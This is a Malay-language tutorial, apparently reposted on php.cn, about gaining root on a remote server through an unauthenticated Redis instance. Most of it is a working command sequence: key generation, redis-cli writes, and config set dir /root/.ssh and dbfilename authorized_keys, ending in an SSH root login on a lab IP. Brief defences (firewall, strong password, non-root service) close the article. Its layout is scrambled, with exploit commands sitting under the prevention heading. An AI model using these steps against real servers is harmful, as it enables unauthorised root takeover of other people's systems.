Rumah  >  Artikel  >  pangkalan data  >  Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci)

Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci)

WBOY
WBOYke hadapan
2022-02-23 17:57:383223semak imbas

Artikel ini membawakan anda pengetahuan yang berkaitan tentang prinsip perlombongan Redis Di sini kami akan menunjukkan cara menggunakan Redis untuk meningkatkan keistimewaan untuk mendapatkan pengguna root pelayan jauh, dan cara melindunginya harap ia akan membantu Semua orang membantu.

Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci)

Pembelajaran yang disyorkan: Tutorial video Redis

Hari ini kami akan menunjukkan cara untuk meningkatkan keistimewaan melalui Redis untuk mendapatkan pengguna Root bagi pelayan jauh.

1. Mula-mula kita memerlukan beberapa prasyarat

  • Syarat 1: Anda mesti mempunyai Redis dahulu, dan kami perlu mengetahui portnya【 Lalai 6379];

  • Syarat 2: Kata laluan untuk Redis tidak boleh terlalu rumit, atau tiada kata laluan; yang memulakan Redis adalah yang paling Untungnya, ia adalah pengguna Root, yang lebih merosakkan; >

  • 2.1 Cipta sepasang kunci rahsia
Hasilkan pasangan melalui ssh-keygen Sudah tentu, anda boleh menggunakan yang anda sudah ada tanpa sebarang masalah.

Seterusnya, nilai kunci serangan dijana melalui kunci awam

  • Kandungan adalah seperti berikut

    Tujuan menambah dua baris baharu sebelum dan selepas di sini adalah untuk menghalang sambungan data Bersama-sama mereka menyebabkan masalah kegagalan.

2.2 Konfigurasikan Kunci kepada Redis
root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt

Operasi adalah seperti berikut:

root@kali:/tmp/rediskey# cat foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

Log masuk ke Redis Semak sama ada ia telah ditulis kepada Redis.

  • 2.3 Gantikan fail sistem melalui mekanisme penjimatan Redis

Lihat operasi berikut
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK

Pada masa ini, kami log masuk ke hos jauh untuk melihat kesannya.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
  • OK, kami telah berjaya meningkatkan keistimewaan di sini, jadi mari kita lihat apakah fail yang dieksport? Sebenarnya, ia hanyalah bentuk fail Redis yang disimpan Jika anda berminat, anda boleh membukanya sendiri dan melihatnya tidak akan ditunjukkan di sini.

    3. Bagaimana untuk mencegah

Kerentanan ini cukup kuat sekarang, tambahkannya pada tugas yang dijadualkan untuk melaksanakan beberapa skrip dan kemudian Apa mengenai jangkitan kumpulan?

Teknik pencegahan adalah seperti berikut:
192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~#
Redis tidak seharusnya dipantau pada IP berbahaya Jika ya, sila tambah kawalan tembok api

Sekatan Kata Laluan Redis mesti ditingkatkan dan tidak boleh menjadi kata laluan yang lemah;

Cuba untuk tidak memulakan Redis sebagai pengguna Root.

  • Ikuti tiga perkara di atas untuk mengelakkan perlombongan Redis, dan tidak akan ada masalah

    Pembelajaran yang disyorkan:
  • Tutorial video Redis

Atas ialah kandungan terperinci Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci). Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan:
Artikel ini dikembalikan pada:csdn.net. Jika ada pelanggaran, sila hubungi admin@php.cn Padam